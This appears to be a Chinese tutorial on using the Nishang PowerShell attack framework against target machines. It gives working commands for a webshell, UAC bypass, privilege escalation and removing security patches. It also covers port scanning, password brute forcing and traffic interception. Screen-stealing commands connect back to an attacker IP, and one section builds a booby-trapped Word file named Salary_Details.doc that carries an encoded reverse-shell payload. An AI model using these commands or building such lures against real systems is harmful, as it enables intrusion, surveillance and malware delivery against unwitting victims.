nishang工具进阶实战内容

lsekfe

4.3 webshell
　　存放于nishangAntak-WebShell目录下，就是一个ASPX的大马，但是命令行是PowerShell，比单纯的cmd强大很多。功能齐全，日aspx的站必备的东西。

同样需要账号密码，上传下载，无所不能。
　　4.4 提权
　　渗透过程中，这里应该是使用最多的地方了。
　　4.4.1 尝试本地权限提升
　　Enable-DuplicateToken
　　这个脚本在我们具有一定权限的时候，可以帮助帮助我们获得系统权限。
　　4.4.2 Bypass UAC
　　Invoke-PsUACme 看名字就知道是干嘛的了。绕过UAC吗~，Nishang中给出的方法太全面了，GET-HELP来看看帮助信息。


实例一: 使用Sysprep方法和默认的Payload执行。
　　实例二: 使用oobe方法跟默认的payload执行。
　　实例三: 使用oobe方法跟自制payload执行。
　　这个模块用的是UACME项目的DLL来Bypass UAC。所以，方法对照表。


这只是官方给的例子，回过头来看一眼上面的参数信息。

-Payloadpath指定一个payload路径
　　-CustomDll64
　　指定一个dll文件，后两位代表系统位数。
　　-CustomDll32
　　尝试本地Bypass UAC:


4.4.3 删除补丁
　　删除补丁，这是我见过最`厉害`的脚本，没有之一。如此骚气！
　　Remove-Update


实例一: 删除全部补丁
　　实例二: 删除全部的安全补丁
　　实例三: 删除指定的补丁
　　这是删除之前的补丁情况。


尝试删除第一个补丁。

成功删除了第一个补丁。
　　4.5端口扫描，爆破
　　4.5.1： 端口扫描
　　来详细说明下个个参数
　　可以使用 Get-Help Invoke-PortScan -full 查看帮助信息。


-StartAddress 开始的IP地址
　　-EndAddress 结束的IP地址
　　-ResolveHost 是否解析主机名
　　-ScanPort要不要进行端口扫描
　　-Port 要扫描的端口（默认很多，看上图）
　　-TimeOut 超时时间
　　对我本地局域网进行扫描:
　　Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost
　　扫描中:


扫描结束:

4.5.2 弱口令爆破
　　Invoke-BruteForce
　　之前先说命令参数。
　　-ComputerName 对应服务的计算机名
　　-UserList 用户名字典
　　-PasswordList 密码字典
　　-Service 服务（默认为：SQL）
　　-StopOnSuccess 匹配一个后停止
　　-Delay 延迟时间


有了上面的说明，这里看到应该很清楚了。不在做过多的解释。
　　4.6 嗅探
　　内网嗅探，动静太大了，但是，实在没办法的时候，不得不说，这是一个办法。
　　在靶机上执行:Invoke-Interceptor -ProxyServer 192.168.250.172 -ProxyPort 9999
　　监听机器上执行:netcat -lvvp 9999





4.7 屏幕窃取
　　Show-TargetScreen
　　屏幕窃取，一样正反向通吃
　　-IPAddress 后面加IP地址（反向链接需要）
　　-Port 加端口
　　-Bind 正向连接
　　反向链接窃取屏幕
　　靶机:Show-TargetScreen -Reverse -IPAddress 192.168.250.172 -Port 3333
　　攻击机:netcat -nlvp 3333 | netcat -nlvp 9999
　　之后访问攻击机器的9999端口，就可以窃取到屏幕了
　　正向连接窃取屏幕
　　靶机执行:Show-TargetScreen -Bind -Port 3333
　　攻击机执行:netcat -nv 192.168.250.37 3333 | netcat -lnvp 9999
　　之后同样，访问本机的9999端口，就能正常访问了。


4.8 Client
　　Nishang可以生成各式各样的客户端。类型大概有这么多类型全都可以生成。选择一种来说，其他的方法都是类似的。


打开nishangShellsInvoke-PowerShellTcpOneLine.ps1这个文件，复制第三行的内容。可以看到中间有一个TCPClient的参数，这里就是远程连接的地址了。

更改这个地址和端口即可，之后进入命令行执行
　　Invoke-Encode -DataToEncode '你的代码' -IsString -PostScript


执行完成之后会在当前目录下生成两个文件。一个是encoded.txt 另一个是encodedcommand.txt。之后执行
　　Out-Word -PayloadScript .encodedcommand.txt
　　就可以在我们当前文件夹下生成一个名为Salary_Details.doc的doc文件。之后使用nc监听就好。说完了操作，回过头来看看命令行参数：
　　-Payload 后面直接加payload，但是注意引号的闭合
　　-PayloadURL 传入远程的payload进行生成
　　-PayloadScript 指定本地的脚本进行生成
　　-Arguments 之后加要执行的函数。（payload之中有的函数）
　　-OutputFile 输出的文件名
　　-WordFileDir 输出的目录地址
　　-Recurse 在WordFileDir中递归寻找Word文件
　　-RemoveDocx 创建完成后删除掉原始的文件
　　5.总结
　　看完之后肯定一脸懵逼，这都是啥。这么复杂的语法，没办法，针对PowerShell的工具语法相对而言都比较复杂。而且，并没有讲解nishang的后门模块，个人觉得不是那么好用。还有一些反弹技巧并没有详细介绍，比如说什么DNS反弹，ICMP反弹，WMI反弹。
　　有兴趣的朋友可以自行研究，每一款工具针对不同的环境都能给我们带来意想不到的效果。不用归不用,但是到万不得已用的时候，才是最恶心的，艺多不压身嘛~